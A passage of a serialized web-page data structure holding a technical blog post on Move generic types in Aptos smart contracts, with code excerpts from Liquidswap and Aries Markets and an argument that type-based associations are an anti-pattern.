UID,\n",{"type":28,"tag":116,"props":5635,"children":5636},{"class":245,"line":361},[5637,5642,5646,5651,5655,5660],{"type":28,"tag":116,"props":5638,"children":5639},{"style":272},[5640],{"type":33,"value":5641},"      balance",{"type":28,"tag":116,"props":5643,"children":5644},{"style":370},[5645],{"type":33,"value":4160},{"type":28,"tag":116,"props":5647,"children":5648},{"style":339},[5649],{"type":33,"value":5650}," Balance",{"type":28,"tag":116,"props":5652,"children":5653},{"style":266},[5654],{"type":33,"value":514},{"type":28,"tag":116,"props":5656,"children":5657},{"style":339},[5658],{"type":33,"value":5659},"T",{"type":28,"tag":116,"props":5661,"children":5662},{"style":266},[5663],{"type":33,"value":506},{"type":28,"tag":116,"props":5665,"children":5666},{"class":245,"line":387},[5667],{"type":28,"tag":116,"props":5668,"children":5669},{"style":266},[5670],{"type":33,"value":5543},{"type":28,"tag":29,"props":5672,"children":5673},{},[5674],{"type":28,"tag":2583,"props":5675,"children":5676},{},[5677],{"type":33,"value":5678},"sui",{"type":28,"tag":29,"props":5680,"children":5681},{},[5682,5684,5691,5693,5699],{"type":33,"value":5683},"Pulling an example from ",{"type":28,"tag":87,"props":5685,"children":5688},{"href":5686,"rel":5687},"https://pontem.network/",[91],[5689],{"type":33,"value":5690},"Pontem Network's",{"type":33,"value":5692}," Liquidswap DEX implementation on Aptos, we can see that ",{"type":28,"tag":98,"props":5694,"children":5696},{"className":5695},[],[5697],{"type":33,"value":5698},"LiquidityPool",{"type":33,"value":5700}," natively embeds this type information into it's fields.",{"type":28,"tag":234,"props":5702,"children":5704},{"className":2652,"code":5703,"language":2651,"meta":7,"style":7},"    /// Liquidity pool with reserves.\n    struct LiquidityPool\u003Cphantom X, phantom Y, phantom LP> has key {\n        coin_x_reserve: Coin\u003CX>,\n        coin_y_reserve: Coin\u003CY>,\n        // ...\n    }\n",[5705],{"type":28,"tag":98,"props":5706,"children":5707},{"__ignoreMap":7},[5708,5716,5780,5810,5839,5847],{"type":28,"tag":116,"props":5709,"children":5710},{"class":245,"line":246},[5711],{"type":28,"tag":116,"props":5712,"children":5713},{"style":250},[5714],{"type":33,"value":5715},"    /// Liquidity pool with reserves.\n",{"type":28,"tag":116,"props":5717,"children":5718},{"class":245,"line":256},[5719,5724,5729,5733,5737,5742,5746,5750,5755,5759,5763,5768,5772,5776],{"type":28,"tag":116,"props":5720,"children":5721},{"style":376},[5722],{"type":33,"value":5723},"    struct",{"type":28,"tag":116,"props":5725,"children":5726},{"style":339},[5727],{"type":33,"value":5728}," LiquidityPool",{"type":28,"tag":116,"props":5730,"children":5731},{"style":266},[5732],{"type":33,"value":514},{"type":28,"tag":116,"props":5734,"children":5735},{"style":272},[5736],{"type":33,"value":5482},{"type":28,"tag":116,"props":5738,"children":5739},{"style":339},[5740],{"type":33,"value":5741}," X",{"type":28,"tag":116,"props":5743,"children":5744},{"style":266},[5745],{"type":33,"value":825},{"type":28,"tag":116,"props":5747,"children":5748},{"style":272},[5749],{"type":33,"value":5482},{"type":28,"tag":116,"props":5751,"children":5752},{"style":339},[5753],{"type":33,"value":5754}," Y",{"type":28,"tag":116,"props":5756,"children":5757},{"style":266},[5758],{"type":33,"value":825},{"type":28,"tag":116,"props":5760,"children":5761},{"style":272},[5762],{"type":33,"value":5482},{"type":28,"tag":116,"props":5764,"children":5765},{"style":266},[5766],{"type":33,"value":5767}," LP> ",{"type":28,"tag":116,"props":5769,"children":5770},{"style":272},[5771],{"type":33,"value":5497},{"type":28,"tag":116,"props":5773,"children":5774},{"style":272},[5775],{"type":33,"value":5603},{"type":28,"tag":116,"props":5777,"children":5778},{"style":266},[5779],{"type":33,"value":1291},{"type":28,"tag":116,"props":5781,"children":5782},{"class":245,"line":293},[5783,5788,5792,5796,5800,5805],{"type":28,"tag":116,"props":5784,"children":5785},{"style":272},[5786],{"type":33,"value":5787},"        coin_x_reserve",{"type":28,"tag":116,"props":5789,"children":5790},{"style":370},[5791],{"type":33,"value":4160},{"type":28,"tag":116,"props":5793,"children":5794},{"style":339},[5795],{"type":33,"value":5473},{"type":28,"tag":116,"props":5797,"children":5798},{"style":266},[5799],{"type":33,"value":514},{"type":28,"tag":116,"props":5801,"children":5802},{"style":339},[5803],{"type":33,"value":5804},"X",{"type":28,"tag":116,"props":5806,"children":5807},{"style":266},[5808],{"type":33,"value":5809},">,\n",{"type":28,"tag":116,"props":5811,"children":5812},{"class":245,"line":361},[5813,5818,5822,5826,5830,5835],{"type":28,"tag":116,"props":5814,"children":5815},{"style":272},[5816],{"type":33,"value":5817},"        coin_y_reserve",{"type":28,"tag":116,"props":5819,"children":5820},{"style":370},[5821],{"type":33,"value":4160},{"type":28,"tag":116,"props":5823,"children":5824},{"style":339},[5825],{"type":33,"value":5473},{"type":28,"tag":116,"props":5827,"children":5828},{"style":266},[5829],{"type":33,"value":514},{"type":28,"tag":116,"props":5831,"children":5832},{"style":339},[5833],{"type":33,"value":5834},"Y",{"type":28,"tag":116,"props":5836,"children":5837},{"style":266},[5838],{"type":33,"value":5809},{"type":28,"tag":116,"props":5840,"children":5841},{"class":245,"line":387},[5842],{"type":28,"tag":116,"props":5843,"children":5844},{"style":250},[5845],{"type":33,"value":5846},"        // ...\n",{"type":28,"tag":116,"props":5848,"children":5849},{"class":245,"line":400},[5850],{"type":28,"tag":116,"props":5851,"children":5852},{"style":266},[5853],{"type":33,"value":3025},{"type":28,"tag":29,"props":5855,"children":5856},{},[5857],{"type":33,"value":5858},"This has the advantage of aligning type information at compile time. It would be difficult to accidentally pass in the wrong type of coin to a function.",{"type":28,"tag":234,"props":5860,"children":5862},{"className":2652,"code":5861,"language":2651,"meta":7,"style":7},"      public fun mint\u003CX, Y, LP>(\n          pool_addr: address,\n          coin_x: Coin\u003CX>,\n          coin_y: Coin\u003CY>\n      ): Coin\u003CLP> acquires LiquidityPool, EventsStore {\n          // ...\n\n          let (x_reserve_size, y_reserve_size) = get_reserves_size\u003CX, Y, LP>(pool_addr);\n",[5863],{"type":28,"tag":98,"props":5864,"children":5865},{"__ignoreMap":7},[5866,5905,5926,5954,5982,6033,6041,6048],{"type":28,"tag":116,"props":5867,"children":5868},{"class":245,"line":246},[5869,5874,5879,5884,5888,5892,5896,5900],{"type":28,"tag":116,"props":5870,"children":5871},{"style":272},[5872],{"type":33,"value":5873},"      public",{"type":28,"tag":116,"props":5875,"children":5876},{"style":272},[5877],{"type":33,"value":5878}," fun",{"type":28,"tag":116,"props":5880,"children":5881},{"style":272},[5882],{"type":33,"value":5883}," mint",{"type":28,"tag":116,"props":5885,"children":5886},{"style":266},[5887],{"type":33,"value":514},{"type":28,"tag":116,"props":5889,"children":5890},{"style":339},[5891],{"type":33,"value":5804},{"type":28,"tag":116,"props":5893,"children":5894},{"style":266},[5895],{"type":33,"value":825},{"type":28,"tag":116,"props":5897,"children":5898},{"style":339},[5899],{"type":33,"value":5834},{"type":28,"tag":116,"props":5901,"children":5902},{"style":266},[5903],{"type":33,"value":5904},", LP>(\n",{"type":28,"tag":116,"props":5906,"children":5907},{"class":245,"line":256},[5908,5913,5917,5922],{"type":28,"tag":116,"props":5909,"children":5910},{"style":272},[5911],{"type":33,"value":5912},"          pool_addr",{"type":28,"tag":116,"props":5914,"children":5915},{"style":370},[5916],{"type":33,"value":4160},{"type":28,"tag":116,"props":5918,"children":5919},{"style":272},[5920],{"type":33,"value":5921}," address",{"type":28,"tag":116,"props":5923,"children":5924},{"style":266},[5925],{"type":33,"value":3178},{"type":28,"tag":116,"props":5927,"children":5928},{"class":245,"line":293},[5929,5934,5938,5942,5946,5950],{"type":28,"tag":116,"props":5930,"children":5931},{"style":272},[5932],{"type":33,"value":5933},"          coin_x",{"type":28,"tag":116,"props":5935,"children":5936},{"style":370},[5937],{"type":33,"value":4160},{"type":28,"tag":116,"props":5939,"children":5940},{"style":339},[5941],{"type":33,"value":5473},{"type":28,"tag":116,"props":5943,"children":5944},{"style":266},[5945],{"type":33,"value":514},{"type":28,"tag":116,"props":5947,"children":5948},{"style":339},[5949],{"type":33,"value":5804},{"type":28,"tag":116,"props":5951,"children":5952},{"style":266},[5953],{"type":33,"value":5809},{"type":28,"tag":116,"props":5955,"children":5956},{"class":245,"line":361},[5957,5962,5966,5970,5974,5978],{"type":28,"tag":116,"props":5958,"children":5959},{"style":272},[5960],{"type":33,"value":5961},"          coin_y",{"type":28,"tag":116,"props":5963,"children":5964},{"style":370},[5965],{"type":33,"value":4160},{"type":28,"tag":116,"props":5967,"children":5968},{"style":339},[5969],{"type":33,"value":5473},{"type":28,"tag":116,"props":5971,"children":5972},{"style":266},[5973],{"type":33,"value":514},{"type":28,"tag":116,"props":5975,"children":5976},{"style":339},[5977],{"type":33,"value":5834},{"type":28,"tag":116,"props":5979,"children":5980},{"style":266},[5981],{"type":33,"value":506},{"type":28,"tag":116,"props":5983,"children":5984},{"class":245,"line":387},[5985,5990,5994,5998,6002,6007,6011,6016,6020,6024,6029],{"type":28,"tag":116,"props":5986,"children":5987},{"style":266},[5988],{"type":33,"value":5989},"      )",{"type":28,"tag":116,"props":5991,"children":5992},{"style":370},[5993],{"type":33,"value":4160},{"type":28,"tag":116,"props":5995,"children":5996},{"style":339},[5997],{"type":33,"value":5473},{"type":28,"tag":116,"props":5999,"children":6000},{"style":266},[6001],{"type":33,"value":514},{"type":28,"tag":116,"props":6003,"children":6004},{"style":339},[6005],{"type":33,"value":6006},"LP",{"type":28,"tag":116,"props":6008,"children":6009},{"style":266},[6010],{"type":33,"value":5492},{"type":28,"tag":116,"props":6012,"children":6013},{"style":272},[6014],{"type":33,"value":6015},"acquires",{"type":28,"tag":116,"props":6017,"children":6018},{"style":339},[6019],{"type":33,"value":5728},{"type":28,"tag":116,"props":6021,"children":6022},{"style":266},[6023],{"type":33,"value":825},{"type":28,"tag":116,"props":6025,"children":6026},{"style":339},[6027],{"type":33,"value":6028},"EventsStore",{"type":28,"tag":116,"props":6030,"children":6031},{"style":266},[6032],{"type":33,"value":1291},{"type":28,"tag":116,"props":6034,"children":6035},{"class":245,"line":400},[6036],{"type":28,"tag":116,"props":6037,"children":6038},{"style":250},[6039],{"type":33,"value":6040},"          // ...\n",{"type":28,"tag":116,"props":6042,"children":6043},{"class":245,"line":614},[6044],{"type":28,"tag":116,"props":6045,"children":6046},{"emptyLinePlaceholder":19},[6047],{"type":33,"value":1044},{"type":28,"tag":116,"props":6049,"children":6050},{"class":245,"line":631},[6051,6056,6060,6065,6069,6074,6078,6082,6087,6091,6095,6099,6103,6108,6113],{"type":28,"tag":116,"props":6052,"children":6053},{"style":376},[6054],{"type":33,"value":6055},"          let",{"type":28,"tag":116,"props":6057,"children":6058},{"style":266},[6059],{"type":33,"value":269},{"type":28,"tag":116,"props":6061,"children":6062},{"style":272},[6063],{"type":33,"value":6064},"x_reserve_size",{"type":28,"tag":116,"props":6066,"children":6067},{"style":266},[6068],{"type":33,"value":825},{"type":28,"tag":116,"props":6070,"children":6071},{"style":272},[6072],{"type":33,"value":6073},"y_reserve_size",{"type":28,"tag":116,"props":6075,"children":6076},{"style":266},[6077],{"type":33,"value":1609},{"type":28,"tag":116,"props":6079,"children":6080},{"style":370},[6081],{"type":33,"value":373},{"type":28,"tag":116,"props":6083,"children":6084},{"style":272},[6085],{"type":33,"value":6086}," get_reserves_size",{"type":28,"tag":116,"props":6088,"children":6089},{"style":266},[6090],{"type":33,"value":514},{"type":28,"tag":116,"props":6092,"children":6093},{"style":339},[6094],{"type":33,"value":5804},{"type":28,"tag":116,"props":6096,"children":6097},{"style":266},[6098],{"type":33,"value":825},{"type":28,"tag":116,"props":6100,"children":6101},{"style":339},[6102],{"type":33,"value":5834},{"type":28,"tag":116,"props":6104,"children":6105},{"style":266},[6106],{"type":33,"value":6107},", LP>(",{"type":28,"tag":116,"props":6109,"children":6110},{"style":272},[6111],{"type":33,"value":6112},"pool_addr",{"type":28,"tag":116,"props":6114,"children":6115},{"style":266},[6116],{"type":33,"value":895},{"type":28,"tag":29,"props":6118,"children":6119},{},[6120,6122,6128,6130,6137],{"type":33,"value":6121},"As an aside, this generic type information is implemented at runtime in the ",{"type":28,"tag":98,"props":6123,"children":6125},{"className":6124},[],[6126],{"type":33,"value":6127},"ty_args",{"type":33,"value":6129}," ",{"type":28,"tag":87,"props":6131,"children":6134},{"href":6132,"rel":6133},"https://github.com/move-language/move/blob/2412f877a5065132f31bfc339e6d1f2b9de10e87/language/move-vm/runtime/src/interpreter.rs#L88",[91],[6135],{"type":33,"value":6136},"at the vm level",{"type":33,"value":6138},". This VM level implementation choice makes it rather difficult to iterate over arbitrary generic types, such as with summing the coins in a pool. We will be releasing a deep dive into move's VM internals shortly.",{"type":28,"tag":29,"props":6140,"children":6141},{},[6142,6144,6150,6152,6158,6160,6166,6167,6173],{"type":33,"value":6143},"In pseucode, this checks that ",{"type":28,"tag":98,"props":6145,"children":6147},{"className":6146},[],[6148],{"type":33,"value":6149},"coin_x.type",{"type":33,"value":6151}," is equal to ",{"type":28,"tag":98,"props":6153,"children":6155},{"className":6154},[],[6156],{"type":33,"value":6157},"pool.x_type",{"type":33,"value":6159},", and ",{"type":28,"tag":98,"props":6161,"children":6163},{"className":6162},[],[6164],{"type":33,"value":6165},"coin_y.type",{"type":33,"value":6151},{"type":28,"tag":98,"props":6168,"children":6170},{"className":6169},[],[6171],{"type":33,"value":6172},"pool.y_type",{"type":33,"value":141},{"type":28,"tag":29,"props":6175,"children":6176},{},[6177],{"type":33,"value":6178},"This type system has two advantages",{"type":28,"tag":455,"props":6180,"children":6181},{},[6182,6194],{"type":28,"tag":459,"props":6183,"children":6184},{},[6185,6187,6192],{"type":33,"value":6186},"It's required. The type parameter ",{"type":28,"tag":2583,"props":6188,"children":6189},{},[6190],{"type":33,"value":6191},"must",{"type":33,"value":6193}," be specified so it's impossible to forget such a constraint",{"type":28,"tag":459,"props":6195,"children":6196},{},[6197],{"type":33,"value":6198},"It's concise. Constraints are done via type parameter alignment instead of verbose equivalence checks",{"type":28,"tag":29,"props":6200,"children":6201},{},[6202],{"type":33,"value":6203},"However, this system isn't perfect.",{"type":28,"tag":29,"props":6205,"children":6206},{},[6207,6209,6214],{"type":33,"value":6208},"In fact, I would go as far as to argue that using types to create such associations is ",{"type":28,"tag":4995,"props":6210,"children":6211},{},[6212],{"type":33,"value":6213},"an anti-pattern",{"type":33,"value":141},{"type":28,"tag":29,"props":6216,"children":6217},{},[6218,6220,6226],{"type":33,"value":6219},"Using types to enforce relationships only works because types are uniquely associated with instances. For example, in Aptos's coin initialization function, they explicitly assert that there hasn't been a previously initialized ",{"type":28,"tag":98,"props":6221,"children":6223},{"className":6222},[],[6224],{"type":33,"value":6225},"CoinInfo\u003CCoinType>",{"type":33,"value":141},{"type":28,"tag":234,"props":6228,"children":6230},{"className":2652,"code":6229,"language":2651,"meta":7,"style":7},"  fun initialize_internal\u003CCoinType>(\n      // ...\n  ): (BurnCapability\u003CCoinType>, FreezeCapability\u003CCoinType>, MintCapability\u003CCoinType>) {\n      // ...\n\n      assert!(\n          !exists\u003CCoinInfo\u003CCoinType>>(account_addr),\n          error::already_exists(ECOIN_INFO_ALREADY_PUBLISHED),\n      );\n",[6231],{"type":28,"tag":98,"props":6232,"children":6233},{"__ignoreMap":7},[6234,6261,6269,6338,6345,6352,6364,6409,6431],{"type":28,"tag":116,"props":6235,"children":6236},{"class":245,"line":246},[6237,6242,6247,6251,6256],{"type":28,"tag":116,"props":6238,"children":6239},{"style":272},[6240],{"type":33,"value":6241},"  fun",{"type":28,"tag":116,"props":6243,"children":6244},{"style":272},[6245],{"type":33,"value":6246}," initialize_internal",{"type":28,"tag":116,"props":6248,"children":6249},{"style":266},[6250],{"type":33,"value":514},{"type":28,"tag":116,"props":6252,"children":6253},{"style":339},[6254],{"type":33,"value":6255},"CoinType",{"type":28,"tag":116,"props":6257,"children":6258},{"style":266},[6259],{"type":33,"value":6260},">(\n",{"type":28,"tag":116,"props":6262,"children":6263},{"class":245,"line":256},[6264],{"type":28,"tag":116,"props":6265,"children":6266},{"style":250},[6267],{"type":33,"value":6268},"      // ...\n",{"type":28,"tag":116,"props":6270,"children":6271},{"class":245,"line":293},[6272,6277,6281,6285,6290,6294,6298,6303,6308,6312,6316,6320,6325,6329,6333],{"type":28,"tag":116,"props":6273,"children":6274},{"style":266},[6275],{"type":33,"value":6276},"  )",{"type":28,"tag":116,"props":6278,"children":6279},{"style":370},[6280],{"type":33,"value":4160},{"type":28,"tag":116,"props":6282,"children":6283},{"style":266},[6284],{"type":33,"value":269},{"type":28,"tag":116,"props":6286,"children":6287},{"style":339},[6288],{"type":33,"value":6289},"BurnCapability",{"type":28,"tag":116,"props":6291,"children":6292},{"style":266},[6293],{"type":33,"value":514},{"type":28,"tag":116,"props":6295,"children":6296},{"style":339},[6297],{"type":33,"value":6255},{"type":28,"tag":116,"props":6299,"children":6300},{"style":266},[6301],{"type":33,"value":6302},">, ",{"type":28,"tag":116,"props":6304,"children":6305},{"style":339},[6306],{"type":33,"value":6307},"FreezeCapability",{"type":28,"tag":116,"props":6309,"children":6310},{"style":266},[6311],{"type":33,"value":514},{"type":28,"tag":116,"props":6313,"children":6314},{"style":339},[6315],{"type":33,"value":6255},{"type":28,"tag":116,"props":6317,"children":6318},{"style":266},[6319],{"type":33,"value":6302},{"type":28,"tag":116,"props":6321,"children":6322},{"style":339},[6323],{"type":33,"value":6324},"MintCapability",{"type":28,"tag":116,"props":6326,"children":6327},{"style":266},[6328],{"type":33,"value":514},{"type":28,"tag":116,"props":6330,"children":6331},{"style":339},[6332],{"type":33,"value":6255},{"type":28,"tag":116,"props":6334,"children":6335},{"style":266},[6336],{"type":33,"value":6337},">) {\n",{"type":28,"tag":116,"props":6339,"children":6340},{"class":245,"line":361},[6341],{"type":28,"tag":116,"props":6342,"children":6343},{"style":250},[6344],{"type":33,"value":6268},{"type":28,"tag":116,"props":6346,"children":6347},{"class":245,"line":387},[6348],{"type":28,"tag":116,"props":6349,"children":6350},{"emptyLinePlaceholder":19},[6351],{"type":33,"value":1044},{"type":28,"tag":116,"props":6353,"children":6354},{"class":245,"line":400},[6355,6360],{"type":28,"tag":116,"props":6356,"children":6357},{"style":282},[6358],{"type":33,"value":6359},"      assert!",{"type":28,"tag":116,"props":6361,"children":6362},{"style":266},[6363],{"type":33,"value":3133},{"type":28,"tag":116,"props":6365,"children":6366},{"class":245,"line":614},[6367,6372,6377,6381,6386,6390,6394,6399,6404],{"type":28,"tag":116,"props":6368,"children":6369},{"style":370},[6370],{"type":33,"value":6371},"          !",{"type":28,"tag":116,"props":6373,"children":6374},{"style":272},[6375],{"type":33,"value":6376},"exists",{"type":28,"tag":116,"props":6378,"children":6379},{"style":266},[6380],{"type":33,"value":514},{"type":28,"tag":116,"props":6382,"children":6383},{"style":339},[6384],{"type":33,"value":6385},"CoinInfo",{"type":28,"tag":116,"props":6387,"children":6388},{"style":266},[6389],{"type":33,"value":514},{"type":28,"tag":116,"props":6391,"children":6392},{"style":339},[6393],{"type":33,"value":6255},{"type":28,"tag":116,"props":6395,"children":6396},{"style":266},[6397],{"type":33,"value":6398},">>(",{"type":28,"tag":116,"props":6400,"children":6401},{"style":272},[6402],{"type":33,"value":6403},"account_addr",{"type":28,"tag":116,"props":6405,"children":6406},{"style":266},[6407],{"type":33,"value":6408},"),\n",{"type":28,"tag":116,"props":6410,"children":6411},{"class":245,"line":631},[6412,6417,6421,6426],{"type":28,"tag":116,"props":6413,"children":6414},{"style":266},[6415],{"type":33,"value":6416},"          error",{"type":28,"tag":116,"props":6418,"children":6419},{"style":370},[6420],{"type":33,"value":3151},{"type":28,"tag":116,"props":6422,"children":6423},{"style":282},[6424],{"type":33,"value":6425},"already_exists",{"type":28,"tag":116,"props":6427,"children":6428},{"style":266},[6429],{"type":33,"value":6430},"(ECOIN_INFO_ALREADY_PUBLISHED),\n",{"type":28,"tag":116,"props":6432,"children":6433},{"class":245,"line":665},[6434],{"type":28,"tag":116,"props":6435,"children":6436},{"style":266},[6437],{"type":33,"value":6438},"      );\n",{"type":28,"tag":29,"props":6440,"children":6441},{},[6442,6444,6449],{"type":33,"value":6443},"While this ",{"type":28,"tag":98,"props":6445,"children":6447},{"className":6446},[],[6448],{"type":33,"value":6385},{"type":33,"value":6450}," isn't returned directly, it still ensures uniqueness of the capability objects.",{"type":28,"tag":29,"props":6452,"children":6453},{},[6454,6456,6463],{"type":33,"value":6455},"Similarly, consider ",{"type":28,"tag":87,"props":6457,"children":6460},{"href":6458,"rel":6459},"https://ariesmarkets.xyz/",[91],[6461],{"type":33,"value":6462},"Aries Markets",{"type":33,"value":6464},", a lending/borrowing protocol building on Aptos.",{"type":28,"tag":29,"props":6466,"children":6467},{},[6468,6470,6476],{"type":33,"value":6469},"Their ",{"type":28,"tag":98,"props":6471,"children":6473},{"className":6472},[],[6474],{"type":33,"value":6475},"ReserveCoinContainer",{"type":33,"value":6477}," struct stores all the relevant data and resources for managing a lending market.",{"type":28,"tag":234,"props":6479,"children":6481},{"className":2652,"code":6480,"language":2651,"meta":7,"style":7},"  /// The struct to hold all the underlying `Coin`s.\n  /// Stored as a resources.\n  struct ReserveCoinContainer\u003Cphantom Coin0> has key {\n      /// Stores the available `Coin`.\n      underlying_coin: Coin\u003CCoin0>,\n      /// Stores the LP `Coin` that act as collateral.\n      collateralised_lp_coin: Coin\u003CLP\u003CCoin0>>,\n      /// Mint capability for LP Coin.\n      mint_capability: MintCapability\u003CLP\u003CCoin0>>,\n      /// Burn capability for LP Coin.\n      burn_capability: BurnCapability\u003CLP\u003CCoin0>>,\n\n      // ...\n  }\n\n",[6482],{"type":28,"tag":98,"props":6483,"children":6484},{"__ignoreMap":7},[6485,6493,6501,6542,6550,6579,6587,6624,6632,6669,6677,6714,6721,6728],{"type":28,"tag":116,"props":6486,"children":6487},{"class":245,"line":246},[6488],{"type":28,"tag":116,"props":6489,"children":6490},{"style":250},[6491],{"type":33,"value":6492},"  /// The struct to hold all the underlying `Coin`s.\n",{"type":28,"tag":116,"props":6494,"children":6495},{"class":245,"line":256},[6496],{"type":28,"tag":116,"props":6497,"children":6498},{"style":250},[6499],{"type":33,"value":6500},"  /// Stored as a resources.\n",{"type":28,"tag":116,"props":6502,"children":6503},{"class":245,"line":293},[6504,6508,6513,6517,6521,6526,6530,6534,6538],{"type":28,"tag":116,"props":6505,"children":6506},{"style":376},[6507],{"type":33,"value":5468},{"type":28,"tag":116,"props":6509,"children":6510},{"style":339},[6511],{"type":33,"value":6512}," ReserveCoinContainer",{"type":28,"tag":116,"props":6514,"children":6515},{"style":266},[6516],{"type":33,"value":514},{"type":28,"tag":116,"props":6518,"children":6519},{"style":272},[6520],{"type":33,"value":5482},{"type":28,"tag":116,"props":6522,"children":6523},{"style":339},[6524],{"type":33,"value":6525}," Coin0",{"type":28,"tag":116,"props":6527,"children":6528},{"style":266},[6529],{"type":33,"value":5492},{"type":28,"tag":116,"props":6531,"children":6532},{"style":272},[6533],{"type":33,"value":5497},{"type":28,"tag":116,"props":6535,"children":6536},{"style":272},[6537],{"type":33,"value":5603},{"type":28,"tag":116,"props":6539,"children":6540},{"style":266},[6541],{"type":33,"value":1291},{"type":28,"tag":116,"props":6543,"children":6544},{"class":245,"line":361},[6545],{"type":28,"tag":116,"props":6546,"children":6547},{"style":250},[6548],{"type":33,"value":6549},"      /// Stores the available `Coin`.\n",{"type":28,"tag":116,"props":6551,"children":6552},{"class":245,"line":387},[6553,6558,6562,6566,6570,6575],{"type":28,"tag":116,"props":6554,"children":6555},{"style":272},[6556],{"type":33,"value":6557},"      underlying_coin",{"type":28,"tag":116,"props":6559,"children":6560},{"style":370},[6561],{"type":33,"value":4160},{"type":28,"tag":116,"props":6563,"children":6564},{"style":339},[6565],{"type":33,"value":5473},{"type":28,"tag":116,"props":6567,"children":6568},{"style":266},[6569],{"type":33,"value":514},{"type":28,"tag":116,"props":6571,"children":6572},{"style":339},[6573],{"type":33,"value":6574},"Coin0",{"type":28,"tag":116,"props":6576,"children":6577},{"style":266},[6578],{"type":33,"value":5809},{"type":28,"tag":116,"props":6580,"children":6581},{"class":245,"line":400},[6582],{"type":28,"tag":116,"props":6583,"children":6584},{"style":250},[6585],{"type":33,"value":6586},"      /// Stores the LP `Coin` that act as collateral.\n",{"type":28,"tag":116,"props":6588,"children":6589},{"class":245,"line":614},[6590,6595,6599,6603,6607,6611,6615,6619],{"type":28,"tag":116,"props":6591,"children":6592},{"style":272},[6593],{"type":33,"value":6594},"      collateralised_lp_coin",{"type":28,"tag":116,"props":6596,"children":6597},{"style":370},[6598],{"type":33,"value":4160},{"type":28,"tag":116,"props":6600,"children":6601},{"style":339},[6602],{"type":33,"value":5473},{"type":28,"tag":116,"props":6604,"children":6605},{"style":266},[6606],{"type":33,"value":514},{"type":28,"tag":116,"props":6608,"children":6609},{"style":339},[6610],{"type":33,"value":6006},{"type":28,"tag":116,"props":6612,"children":6613},{"style":266},[6614],{"type":33,"value":514},{"type":28,"tag":116,"props":6616,"children":6617},{"style":339},[6618],{"type":33,"value":6574},{"type":28,"tag":116,"props":6620,"children":6621},{"style":266},[6622],{"type":33,"value":6623},">>,\n",{"type":28,"tag":116,"props":6625,"children":6626},{"class":245,"line":631},[6627],{"type":28,"tag":116,"props":6628,"children":6629},{"style":250},[6630],{"type":33,"value":6631},"      /// Mint capability for LP Coin.\n",{"type":28,"tag":116,"props":6633,"children":6634},{"class":245,"line":665},[6635,6640,6644,6649,6653,6657,6661,6665],{"type":28,"tag":116,"props":6636,"children":6637},{"style":272},[6638],{"type":33,"value":6639},"      mint_capability",{"type":28,"tag":116,"props":6641,"children":6642},{"style":370},[6643],{"type":33,"value":4160},{"type":28,"tag":116,"props":6645,"children":6646},{"style":339},[6647],{"type":33,"value":6648}," MintCapability",{"type":28,"tag":116,"props":6650,"children":6651},{"style":266},[6652],{"type":33,"value":514},{"type":28,"tag":116,"props":6654,"children":6655},{"style":339},[6656],{"type":33,"value":6006},{"type":28,"tag":116,"props":6658,"children":6659},{"style":266},[6660],{"type":33,"value":514},{"type":28,"tag":116,"props":6662,"children":6663},{"style":339},[6664],{"type":33,"value":6574},{"type":28,"tag":116,"props":6666,"children":6667},{"style":266},[6668],{"type":33,"value":6623},{"type":28,"tag":116,"props":6670,"children":6671},{"class":245,"line":713},[6672],{"type":28,"tag":116,"props":6673,"children":6674},{"style":250},[6675],{"type":33,"value":6676},"      /// Burn capability for LP Coin.\n",{"type":28,"tag":116,"props":6678,"children":6679},{"class":245,"line":750},[6680,6685,6689,6694,6698,6702,6706,6710],{"type":28,"tag":116,"props":6681,"children":6682},{"style":272},[6683],{"type":33,"value":6684},"      burn_capability",{"type":28,"tag":116,"props":6686,"children":6687},{"style":370},[6688],{"type":33,"value":4160},{"type":28,"tag":116,"props":6690,"children":6691},{"style":339},[6692],{"type":33,"value":6693}," BurnCapability",{"type":28,"tag":116,"props":6695,"children":6696},{"style":266},[6697],{"type":33,"value":514},{"type":28,"tag":116,"props":6699,"children":6700},{"style":339},[6701],{"type":33,"value":6006},{"type":28,"tag":116,"props":6703,"children":6704},{"style":266},[6705],{"type":33,"value":514},{"type":28,"tag":116,"props":6707,"children":6708},{"style":339},[6709],{"type":33,"value":6574},{"type":28,"tag":116,"props":6711,"children":6712},{"style":266},[6713],{"type":33,"value":6623},{"type":28,"tag":116,"props":6715,"children":6716},{"class":245,"line":779},[6717],{"type":28,"tag":116,"props":6718,"children":6719},{"emptyLinePlaceholder":19},[6720],{"type":33,"value":1044},{"type":28,"tag":116,"props":6722,"children":6723},{"class":245,"line":796},[6724],{"type":28,"tag":116,"props":6725,"children":6726},{"style":250},[6727],{"type":33,"value":6268},{"type":28,"tag":116,"props":6729,"children":6730},{"class":245,"line":847},[6731],{"type":28,"tag":116,"props":6732,"children":6733},{"style":266},[6734],{"type":33,"value":5543},{"type":28,"tag":29,"props":6736,"children":6737},{},[6738,6740,6745],{"type":33,"value":6739},"When creating a ",{"type":28,"tag":98,"props":6741,"children":6743},{"className":6742},[],[6744],{"type":33,"value":6475},{"type":33,"value":6746},", uniqueness is implicitly enforced by moving it into a hardcoded address.",{"type":28,"tag":234,"props":6748,"children":6750},{"className":2652,"code":6749,"language":2651,"meta":7,"style":7},"  public(friend) fun create\u003CCoin0>(\n      lp_store: &signer,\n      // ...\n  ) acquires Reserves {\n      lp::assert_is_lp_store(signer::address_of(lp_store));\n\n      // ...\n\n      move_to(lp_store, ReserveCoinContainer\u003CCoin0> {\n        // ...\n      });\n",[6751],{"type":28,"tag":98,"props":6752,"children":6753},{"__ignoreMap":7},[6754,6797,6823,6830,6851,6895,6902,6909,6916,6953,6960],{"type":28,"tag":116,"props":6755,"children":6756},{"class":245,"line":246},[6757,6762,6766,6771,6775,6780,6785,6789,6793],{"type":28,"tag":116,"props":6758,"children":6759},{"style":282},[6760],{"type":33,"value":6761},"  public",{"type":28,"tag":116,"props":6763,"children":6764},{"style":266},[6765],{"type":33,"value":313},{"type":28,"tag":116,"props":6767,"children":6768},{"style":272},[6769],{"type":33,"value":6770},"friend",{"type":28,"tag":116,"props":6772,"children":6773},{"style":266},[6774],{"type":33,"value":1609},{"type":28,"tag":116,"props":6776,"children":6777},{"style":272},[6778],{"type":33,"value":6779},"fun",{"type":28,"tag":116,"props":6781,"children":6782},{"style":272},[6783],{"type":33,"value":6784}," 